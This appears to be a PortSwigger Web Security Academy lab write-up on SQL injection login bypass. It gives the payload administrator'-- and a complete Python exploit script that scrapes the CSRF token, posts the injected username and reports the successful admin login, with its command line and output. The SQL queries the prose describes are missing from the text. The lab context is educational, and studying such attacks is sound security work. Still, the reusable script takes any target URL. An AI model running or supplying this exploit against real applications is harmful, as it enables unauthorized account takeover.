Consider an application that lets users log in with a username and password. If a user submits the username `wiener` and the password `bluecheese`, the application checks the credentials by performing the following SQL query:

If the query returns the details of a user, then the login is successful. Otherwise, it is rejected.

Here, an attacker can log in as any user without a password simply by using the SQL comment sequence `--` to remove the password check from the WHERE clause of the query. For example, submitting the username `administrator'--` and a blank password results in the following query:

This query returns the user whose username is administrator and successfully logs the attacker in as that user.

This lab contains an SQL injection vulnerability in the login function.

To solve the lab, perform an SQL injection attack that logs in to the application as the `administrator` user.

$ python3 sqli_lab_02.py https://ac391f171f7c8b61c0fa3ec000630052.web-security-academy.net/login "administrator'--"

>> SQL injection vulnerability allowing login bypass

>> by Port Swigger Academy

[✓] Csrf Token: 3hPVIbOtx90JjKDpS8owRdk34kFD9BFR

[✓] SQL Injection successful!. We have logged as an Administrator!

import requests

import sys

import urllib3

from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Interface ():

def __init__ (self):

self.red = '\033[91m'

self.green = '\033[92m'

self.white = '\033[37m'

self.yellow = '\033[93m'

self.bold = '\033[1m'

self.end = '\033[0m'

def header(self):

print('\n >> SQL injection vulnerability allowing login bypass')

print(' >> by Port Swigger Academy\n')

def info (self, message):

print(f"[{self.white}*{self.end}] {message}")

def warning (self, message):

print(f"[{self.yellow}!{self.end}] {message}")

def error (self, message):

print(f"[{self.red}x{self.end}] {message}")

def success (self, message):

print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")

global output

output = Interface()

output.header()

proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"} #proxies

def get_csrf_token(s, url):

r = s.get(url, verify=False, proxies=proxies)

soup = BeautifulSoup(r.text, 'html.parser')

csrf = soup.find("input")["value"]

output.success("Csrf Token: %s" %csrf)

return csrf

def exploit_sqli(s, url, payload):

csrf = get_csrf_token(s,url)

data = {"csrf": csrf,"username": payload, "password": "hahahaha"}

r = s.post(url,data=data,verify=False, proxies=proxies)

if "Log out" in r.text:

return True

else:

return False

if __name__ == "__main__":

try:

url = sys.argv[1].strip()

payload = sys.argv[2].strip()

except IndexError:

output.info("Usage: %s <url> <payload>" % sys.argv[0])

output.info('Example: %s www.example.com "1=1"' % sys.argv[0])

sys.exit(-1)

s = requests.Session()

if exploit_sqli(s, url, payload):

output.success("SQL Injection successful!. We have logged as an Administrator!")

else:

output.error("SQL Injection unsuccessful!")